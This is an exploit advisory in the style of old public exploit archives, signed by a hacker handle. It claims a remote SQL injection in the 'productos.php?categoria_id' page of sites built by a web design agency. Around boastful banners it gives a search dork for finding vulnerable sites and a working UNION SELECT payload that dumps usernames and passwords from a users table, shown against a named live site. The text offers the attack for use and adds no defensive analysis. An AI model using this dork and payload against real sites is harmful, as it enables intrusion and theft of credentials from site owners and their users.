################################ IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Warah Agencia (productos.php?categoria_id) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200@Hotmail.com ## ## Vendor : http://www.warah.com.ar/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : "DESIGN BY WARAH AGENCIA CREATIVA" Exploite: www.victim.com/productos.php?categoria_id=[SQL] Example : http://www.casatrasorras.com.ar/trasorras/productos.php?categoria_id=-2/**/Union/**/Select/**/All/**/1,group_concat(username,0x3a,password)/**/From/**/users ######################################################################################### SpeCial TanX To : Skote_Vahshat ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################